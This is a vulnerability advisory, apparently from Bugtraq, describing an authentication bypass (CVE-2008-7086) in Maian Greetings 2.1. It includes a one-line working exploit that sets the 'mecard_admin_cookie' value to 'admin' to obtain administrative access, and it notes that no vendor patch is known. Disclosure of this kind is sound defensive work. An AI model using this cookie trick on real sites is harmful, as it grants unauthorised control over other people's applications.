Maian Greetings 'mecard_admin_cookie' Authentication Bypass Vulnerability

Bugtraq ID:	30199
Class:	Design Error
CVE:	CVE-2008-7086
Remote:	Yes
Local:	No
Published:	Jul 12 2008 12:00AM
Updated:	May 07 2015 05:27PM
Credit:	Saime
Vulnerable:	Maian Script World Maian Greetings 2.1
Not Vulnerable:

Maian Greetings 'mecard_admin_cookie' Authentication Bypass Vulnerability

Maian Greetings is prone to an authentication-bypass vulnerability because if fails to adequately authenticate users.

Attackers can exploit this issue to gain administrative access to the application.

Maian Greetings 2.1 is vulnerable; other versions may also be affected.

Maian Greetings 'mecard_admin_cookie' Authentication Bypass Vulnerability

Attackers can exploit this issue via a browser.

The following example exploit is available:

javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"

Maian Greetings 'mecard_admin_cookie' Authentication Bypass Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

Maian Greetings 'mecard_admin_cookie' Authentication Bypass Vulnerability

References:

• Maian Weblog Homepage (Maian Script World)